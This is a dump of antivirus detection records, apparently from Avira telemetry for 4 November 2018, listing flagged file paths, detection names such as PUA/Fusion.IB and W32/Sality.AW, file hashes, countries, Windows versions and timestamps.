  Row(detection=Row(filename='avscan-20181104-151145-2ee74a00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151145-2EE74A00', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145131-cc8d4aa6', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145131-CC8D4AA6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-050230-826c12c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-045101-EF83A9A5\\AVSCAN-20181104-050230-826C12C9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:02:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124712-877a8d95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124712-877A8D95', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213602-afc72178', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213602-AFC72178', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-045555-2e224c60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-045101-EF83A9A5\\AVSCAN-20181104-045555-2E224C60', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:55:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134828-6b9984c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134828-6B9984C0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134822-6acde2ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134822-6ACDE2ED', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123921-453f8394', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123921-453F8394', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:39:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-040420-9f8de1c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e64da3d\\AVSCAN-20181104-040337-5F888003\\AVSCAN-20181104-040420-9F8DE1C4', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:04:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxa7155.tmp', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa7154.tmp\\dxa7155.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:54:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:16:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132135-667a9089', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_8be28640\\AVSCAN-20181104-131239-138C782E\\AVSCAN-20181104-132135-667A9089', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144900-b14fe71a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-144900-B14FE71A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\36NIUATH\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\36NIUATH\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132149-68b71ec5', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_8be28640\\AVSCAN-20181104-131239-138C782E\\AVSCAN-20181104-132149-68B71EC5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191331-e5514f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-191331-E5514F9F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:13:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134441-4e8363df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134441-4E8363DF', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxabf3d.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaBF3C.tmp\\dxaBF3D.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213621-b38667a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213621-B38667A4', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102348-b88a91fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102348-B88A91FD', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102355-b99aa52f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102355-B99AA52F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102350-b8d19971', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102350-B8D19971', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxac890.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaC88F.tmp\\dxaC890.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxac601.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaC600.tmp\\dxaC601.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102342-b785c3a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102342-B785C3A2', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102353-b941a183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102353-B941A183', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213629-b549f31b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213629-B549F31B', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192850-75b6a0f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-192850-75B6A0F7', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:28:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Dokumente und Einstellungen\\Karl\\Lokale Einstellungen\\Temporary Internet Files\\Content.IE5\\L9XLAHBM\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110320-b2dcfbf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3d82604\\AVSCAN-20181104-110246-AC86BAA1\\AVSCAN-20181104-110320-B2DCFBF0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124529-78fcfeac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124529-78FCFEAC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxaa2ff.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaA2FE.tmp\\dxaA2FF.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134223-3cdc9340', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134223-3CDC9340', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:16:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124646-83d1efd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124646-83D1EFD6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\ZWEWA8YO\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:46:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123435-1d06a52c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123435-1D06A52C', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123631-2d5d13d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123631-2D5D13D7', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\SFWQEHQM\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102421-bdd34d7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102421-BDD34D7C', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145704-0869fc71', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145704-0869FC71', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:17:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102401-ba8fbec1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102401-BA8FBEC1', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141706-aef875d0', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-141628-BF9D0BA0\\AVSCAN-20181104-141706-AEF875D0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145700-07ba1ce1', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145700-07BA1CE1', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninstall.exe', filepath='C:\\Program Files\\TeamViewer\\uninstall.exe', filesize=988000, name='W32/Sality.AW.#M1.#R1'), hash='0c291fc0960a4c3d775f5cec79bf0013f58745cc40e7832890eea05fa76820e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T00:51:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='convertavitomp4_setup-downloader.exe', filepath='\\\\s02\\install\\Software\\_Video\\convertavitomp4_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='0c958b5f847c20f5dfe26f112d47e0f8f4e69558a64b2ebfd97e9da8e629756d', metadata=Row(cmdline='\\\\\\\\\\\\\\\\s02\\\\\\\\install\\\\\\\\ E:\\\\\\\\S02\\\\\\\\install\\\\\\\\ *.* \\\\\\/R:3 \\\\\\/W:1 \\\\\\/mir \\\\\\/log+:install.log', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=103936, timestamp='2018-11-04T10:41:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114319-59fd03ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_02575c9b\\AVSCAN-20181104-114135-46254343\\AVSCAN-20181104-114319-59FD03AC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='0c958b5f847c20f5dfe26f112d47e0f8f4e69558a64b2ebfd97e9da8e629756d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:43:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:17:08Z'), dt=datetime.date(2018, 11, 4)),
